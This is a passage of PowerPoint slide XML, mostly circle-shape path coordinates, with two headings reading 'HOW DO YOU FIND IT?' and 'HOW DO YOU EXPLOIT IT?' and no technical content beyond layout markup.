                  <a:lnTo>
                    <a:pt x="1887388" y="297962"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1853362" y="267807"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1818129" y="239028"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1781733" y="211666"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1744214" y="185763"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1705616" y="161362"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1665981" y="138505"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1625350" y="117234"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1583767" y="97591"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1541273" y="79618"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1497910" y="63358"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1453720" y="48853"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1408747" y="36145"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1363032" y="25277"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1316617" y="16289"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1269544" y="9226"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1221856" y="4128"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1173595" y="1039"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1124803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174650" y="4113801"/>
              <a:ext cx="1294201" cy="12942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392445" y="6447418"/>
            <a:ext cx="2985135" cy="121920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601980" marR="5080" indent="-589915">
              <a:lnSpc>
                <a:spcPts val="4450"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="660"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="4100" spc="-370">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>HOW </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4100" spc="-445">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>DO </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4100" spc="-550">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>YOU  </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4100" spc="-365">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>FIND</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4100" spc="-225">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4100" spc="-325">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>IT?</a:t>
            </a:r>
            <a:endParaRPr sz="4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093274" y="3594770"/>
            <a:ext cx="2249805" cy="2249805"/>
            <a:chOff x="11093274" y="3594770"/>
            <a:chExt cx="2249805" cy="2249805"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="12" name="object 12"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="11093274" y="3594770"/>
              <a:ext cx="2249805" cy="2249805"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="2249805" h="2249804">
                  <a:moveTo>
                    <a:pt x="1124782" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1075988" y="1039"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1027726" y="4128"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="980037" y="9226"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="932964" y="16289"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="886548" y="25277"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="840833" y="36145"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="795860" y="48853"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="751671" y="63358"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="708308" y="79618"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="665815" y="97591"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="624232" y="117234"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="583602" y="138505"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="543968" y="161362"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="505371" y="185763"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="467854" y="211666"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="431459" y="239028"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="396228" y="267807"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="362203" y="297962"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="329427" y="329449"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="297941" y="362227"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="267788" y="396253"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="239010" y="431485"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="211650" y="467881"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="185749" y="505399"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="161349" y="543997"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="138493" y="583632"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="117224" y="624262"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="97582" y="665845"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="79611" y="708339"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="63353" y="751702"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="48849" y="795890"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="36142" y="840863"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="25274" y="886578"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="16288" y="932992"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="9225" y="980064"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4128" y="1027751"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1039" y="1076012"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="1124803"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1039" y="1173595"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4128" y="1221856"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="9225" y="1269544"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="16288" y="1316617"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="25274" y="1363032"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="36142" y="1408747"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="48849" y="1453720"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="63353" y="1497910"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="79611" y="1541273"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="97582" y="1583767"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="117224" y="1625350"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="138493" y="1665981"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="161349" y="1705616"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="185749" y="1744214"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="211650" y="1781733"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="239010" y="1818129"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="267788" y="1853362"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="297941" y="1887388"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="329427" y="1920166"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="362203" y="1951654"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="396228" y="1981808"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="431459" y="2010588"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="467854" y="2037950"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="505371" y="2063853"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="543968" y="2088254"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="583602" y="2111111"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="624232" y="2132383"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="665815" y="2152026"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="708308" y="2169998"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="751671" y="2186258"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="795860" y="2200763"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="840833" y="2213471"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="886548" y="2224340"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="932964" y="2233327"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="980037" y="2240390"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1027726" y="2245488"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1075988" y="2248578"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1124782" y="2249617"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1173568" y="2248578"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1221823" y="2245488"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1269506" y="2240390"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1316574" y="2233327"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1362984" y="2224340"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1408696" y="2213471"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1453666" y="2200763"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1497852" y="2186258"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1541212" y="2169998"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1583705" y="2152026"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1625286" y="2132383"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1665915" y="2111111"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1705550" y="2088254"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1744147" y="2063853"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1781665" y="2037950"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1818061" y="2010588"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1853293" y="1981808"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1887320" y="1951654"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1920098" y="1920166"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1951586" y="1887388"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1981741" y="1853362"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2010521" y="1818129"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2037885" y="1781733"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2063788" y="1744214"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2088191" y="1705616"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2111049" y="1665981"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2132322" y="1625350"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2151966" y="1583767"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2169939" y="1541273"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2186200" y="1497910"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2200707" y="1453720"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2213416" y="1408747"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2224285" y="1363032"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2233273" y="1316617"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2240337" y="1269544"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2245435" y="1221856"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2248525" y="1173595"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2249565" y="1124803"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2248525" y="1076012"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2245435" y="1027751"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2240337" y="980064"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2233273" y="932992"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2224285" y="886578"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2213416" y="840863"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2200707" y="795890"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2186200" y="751702"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2169939" y="708339"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2151966" y="665845"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2132322" y="624262"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2111049" y="583632"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2088191" y="543997"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2063788" y="505399"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2037885" y="467881"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2010521" y="431485"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1981741" y="396253"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1951586" y="362227"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1920098" y="329449"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1887320" y="297962"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1853293" y="267807"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1818061" y="239028"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1781665" y="211666"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1744147" y="185763"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1705550" y="161362"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1665915" y="138505"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1625286" y="117234"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1583705" y="97591"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1541212" y="79618"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1497852" y="63358"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1453666" y="48853"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1408696" y="36145"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1362984" y="25277"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1316574" y="16289"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1269506" y="9226"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1221823" y="4128"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1173568" y="1039"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="112478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572422" y="4073593"/>
              <a:ext cx="1291688" cy="12916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725716" y="6447418"/>
            <a:ext cx="2985135" cy="121920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48285" marR="5080" indent="-236220">
              <a:lnSpc>
                <a:spcPts val="4450"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="660"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="4100" spc="-370">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>HOW </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4100" spc="-445">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>DO </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4100" spc="-550">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>YOU  </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4100" spc="-520">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>EXPLOIT</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4100" spc="-240">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4100" spc="-325">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>IT?</a:t>
            </a:r>
            <a:endParaRPr sz="4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426546" y="3594770"/>
            <a:ext cx="2249805" cy="2249805"/>
            <a:chOff x="15426546" y="3594770"/>
            <a:chExt cx="2249805" cy="2249805"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="16" name="object 16"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="15426546" y="3594770"/>
              <a:ext cx="2249805" cy="2249805"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="2249805" h="2249804">
                  <a:moveTo>
                    <a:pt x="1124782" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1075988" y="1039"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1027726" y="4128"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="980037" y="9226"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="932964" y="16289"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="886548" y="25277"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="840833" y="36145"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="795860" y="48853"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="751671" y="63358"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="708308" y="79618"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="665815" y="97591"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="624232" y="117234"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="583602" y="138505"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="543968" y="161362"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="505371" y="185763"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="467854" y="211666"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="431459" y="239028"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="396228" y="267807"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="362203" y="297962"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="329427" y="329449"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="297941" y="362227"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="267788" y="396253"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="239010" y="431485"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="211650" y="467881"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="185749" y="505399"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="161349" y="543997"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="138493" y="583632"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="117224" y="624262"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="97582" y="665845"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="79611" y="708339"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="63353" y="751702"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="48849" y="795890"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="36142" y="840863"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="25274" y="886578"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="16288" y="932992"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="9225" y="980064"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4128" y="1027751"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1039" y="1076012"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="1124803"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1039" y="1173595"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4128" y="1221856"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="9225" y="1269544"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="16288" y="1316617"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="25274" y="1363032"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="36142" y="1408747"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="48849" y="1453720"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="63353" y="1497910"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="79611" y="1541273"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="97582" y="1583767"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="117224" y="1625350"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="138493" y="1665981"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="161349" y="1705616"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="185749" y="1744214"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="211650" y="1781733"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="239010" y="1818129"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="267788" y="1853362"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="297941" y="1887388"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="329427" y="1920166"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="362203" y="1951654"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="396228" y="1981808"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="431459" y="2010588"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="467854" y="2037950"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="505371" y="2063853"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="543968" y="2088254"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="583602" y="2111111"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="624232" y="2132383"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="665815" y="2152026"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="708308" y="2169998"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="751671" y="2186258"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="795860" y="2200763"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="840833" y="2213471"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="886548" y="2224340"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="932964" y="2233327"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="980037" y="2240390"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1027726" y="2245488"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1075988" y="2248578"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1124782" y="2249617"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1173576" y="2248578"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1221838" y="2245488"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1269527" y="2240390"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1316600" y="2233327"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1363016" y="2224340"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1408731" y="2213471"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1453704" y="2200763"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1497893" y="2186258"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1541256" y="2169998"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1583750" y="2152026"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1625332" y="2132383"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1665962" y="2111111"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1705596" y="2088254"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1744193" y="2063853"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1781710" y="2037950"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1818105" y="2010588"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1853336" y="1981808"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1887361" y="1951654"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1920137" y="1920166"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1951623" y="1887388"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1981776" y="1853362"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2010554" y="1818129"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2037914" y="1781733"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2063815" y="1744214"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2088215" y="1705616"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2111071" y="1665981"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2132340" y="1625350"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2151982" y="1583767"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2169953" y="1541273"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2186211" y="1497910"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2200715" y="1453720"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2213422" y="1408747"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2224290" y="1363032"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2233276" y="1316617"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2240339" y="1269544"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2245436" y="1221856"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2248525" y="1173595"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2249565" y="1124803"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2248525" y="1076012"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2245436" y="1027751"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2240339" y="980064"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2233276" y="932992"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2224290" y="886578"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2213422" y="840863"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2200715" y="795890"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2186211" y="751702"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2169953" y="708339"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2151982" y="665845"/>
                  </a:lnTo>
